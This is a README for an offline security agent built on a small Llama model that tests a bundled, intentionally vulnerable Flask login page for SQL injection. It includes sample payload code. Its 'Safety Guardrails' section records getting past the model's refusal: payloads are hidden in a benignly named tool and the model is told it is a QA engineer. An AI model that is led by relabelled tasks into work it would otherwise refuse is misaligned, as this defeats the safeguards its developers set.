LocalLLMSecurityAuditor

An autonomous, privacy-first AI agent that detects SQL Injection vulnerabilities in local environments using Quantized LLMs.


Engineering Case Study

Details
Focus: AI Agents & Cybersecurity
Objective: Create an autonomous auditor running on consumer hardware (i5 + GTX 1050 Ti)
Model: Llama 3.2 3B (Quantized) via Ollama

Key Features

| Feature | Description |
|---|---|
| Autonomous Reasoning | Independent decision-making on which tool to use (ReAct loop) |
| Privacy-First | Runs 100% offline; no data is sent to the cloud |
| Semantic Bypass | Circumvents security filters using QA abstraction techniques |
| Resource Optimized | Tuned for 4 GB VRAM (CPU/GPU hybrid mode) |
| Auto-Reporting | Generates technical reports in Markdown format with evidence |
| Active DAST | Dynamic Application Security Testing focused on SQL Injection |

Architecture

```mermaid
graph LR
    A[Llama 3.2 Brain] -->|Decides Action| B(Python Controller)
    B -->|Executes Tool| C[Tool Set]
    C -->|Inspect HTML| D[Target App]
    C -->|Stress Test Payload| D
    D -->|Response 200/500| B
    B -->|Observation| A
    A -->|Final Decision| E[Report.md]
```
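The loop in the diagram can be sketched in a few lines of Python. This is an illustrative skeleton, not the project's actual `main.py`: `decide` stands in for the Llama 3.2 call and `tools` for the tool set.

```python
def run_agent(decide, tools, max_steps=10):
    """ReAct-style loop: the model decides, the controller executes,
    and the observation is fed back until the model finishes."""
    history = []
    for _ in range(max_steps):
        action = decide(history)           # LLM picks the next tool
        if action == "FINISH":
            break
        observation = tools[action]()      # Python executes it
        history.append((action, observation))
    return history
```

In the real agent, `decide` would wrap a call to the local model via Ollama, and the final decision would write the Markdown report.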

Engineering Journey & Challenges

Building an autonomous agent on consumer hardware (i5 + GTX 1050 Ti + 8GB RAM) presented unique challenges. Here is how we solved them:

1. Hardware Constraints (The "CUDA Error")

Problem: The GTX 1050 Ti (4GB VRAM) struggled with heavy model offloading, causing runtime crashes with modern drivers.

Solution: We implemented a hybrid fallback mechanism in Python (num_gpu=0) and switched to optimized "Tiny" models (Llama 3.2 3B) to ensure stability over raw speed.
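A minimal sketch of such a fallback, assuming the Ollama client's `options` dict (which accepts `num_gpu`); `chat_fn` is injected in place of `ollama.chat` so the retry logic is shown without a running server:

```python
def chat_with_fallback(chat_fn, model, messages):
    """Try default (GPU-offloaded) inference first; on a CUDA-style
    runtime error, retry fully on CPU by forcing num_gpu=0."""
    try:
        return chat_fn(model=model, messages=messages)
    except RuntimeError:
        return chat_fn(model=model, messages=messages,
                       options={"num_gpu": 0})
```

Stability wins over speed here: a CPU-only answer in a minute beats a crashed run in seconds.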

2. The "Context Amnesia" Loop

Problem: Smaller models often lost track of the conversation state, entering infinite loops of the same action (e.g. calling INSPECT_URL over and over).

Solution: We moved from a standard LangChain AgentExecutor to a custom Deterministic Control Loop. This allows the system to "kickstart" the agent if it hesitates and manually parse intent.

3. Safety Guardrails (The "I can't help you" Problem)

Problem: Llama 3.2 refused to generate SQL Injection payloads due to strict safety alignment.

Solution: We applied Semantic Abstraction. Instead of asking the LLM to "attack", we encapsulated the payloads inside a Python tool named stress_test_login_inputs. The LLM operates as a "QA Engineer" performing stability tests, bypassing refusal triggers.
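A hypothetical sketch of that tool shape: the payloads are hard-coded in Python so the LLM only ever requests a "stress test", and `post_fn` stands in for an HTTP POST (e.g. `requests.post`) to keep the detection logic self-contained:

```python
# Classic SQL injection probes, owned by the tool, never by the LLM.
PAYLOADS = ["' OR '1'='1' --", "admin' --", "' UNION SELECT NULL --"]

def stress_test_login_inputs(post_fn, url="http://127.0.0.1:5000/login"):
    """Submit each payload and flag responses that differ from a
    known-bad baseline: a server error (500) or an unexpected
    login success (200 where invalid credentials fail)."""
    baseline = post_fn(url, {"user": "nobody", "password": "wrong"})
    findings = []
    for payload in PAYLOADS:
        resp = post_fn(url, {"user": payload, "password": "x"})
        error = resp["status"] == 500
        bypass = resp["status"] == 200 and baseline["status"] != 200
        if error or bypass:
            findings.append({"payload": payload, "status": resp["status"]})
    return findings
```

From the model's point of view this is a QA stability check on form inputs, so safety alignment has nothing to refuse.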

Getting Started

Prerequisites

  • Python 3.10+
  • Ollama installed and running

1. Setup Environment

```shell
# Clone repository
git clone https://github.com/matheussricardoo/LocalLLMSecurityAuditor.git
cd LocalLLMSecurityAuditor

# Create virtual environment
python -m venv venv
.\venv\Scripts\Activate.ps1   # Windows; on Linux/macOS: source venv/bin/activate

# Install dependencies
pip install -r requirements.txt
```

2. Download the Model

```shell
ollama pull llama3.2:3b
```

3. Usage

You need two terminals running simultaneously:

Terminal 1 (Target Application):

```shell
python target_app/app.py
```

Terminal 2 (Security Agent):

```shell
python main.py
```

Check the generated RELATORIO_FINAL.md after execution.

Project Structure

```
LocalLLMSecurityAuditor/
├── main.py                 # The Agent Brain & Control Loop
├── requirements.txt        # Python dependencies
├── RELATORIO_FINAL.md      # Generated security report
├── tools/
│   ├── __init__.py         # Tools module initialization
│   └── web_tools.py        # Inspection and testing tools
└── target_app/
    └── app.py              # Vulnerable Flask application for testing
```
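For context, the kind of flaw `target_app/app.py` exists to expose is string-built SQL. The standalone `sqlite3` sketch below is illustrative, not the actual Flask app:

```python
import sqlite3

# Toy user table standing in for the target app's database.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (name TEXT, password TEXT)")
db.execute("INSERT INTO users VALUES ('admin', 's3cret')")

def vulnerable_login(user: str, password: str) -> bool:
    # Vulnerable: user input is concatenated straight into the query.
    query = (f"SELECT * FROM users WHERE name = '{user}' "
             f"AND password = '{password}'")
    return db.execute(query).fetchone() is not None
```

A payload like `admin' --` comments out the password check and logs in without credentials; parameterized queries (`db.execute(sql, params)`) close the hole.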

Legal Disclaimer

This tool is developed strictly for educational purposes and authorized security testing (CTF/Lab environments).

The author is not responsible for any misuse of this software. Use this tool only on systems you own or have explicit permission to test.
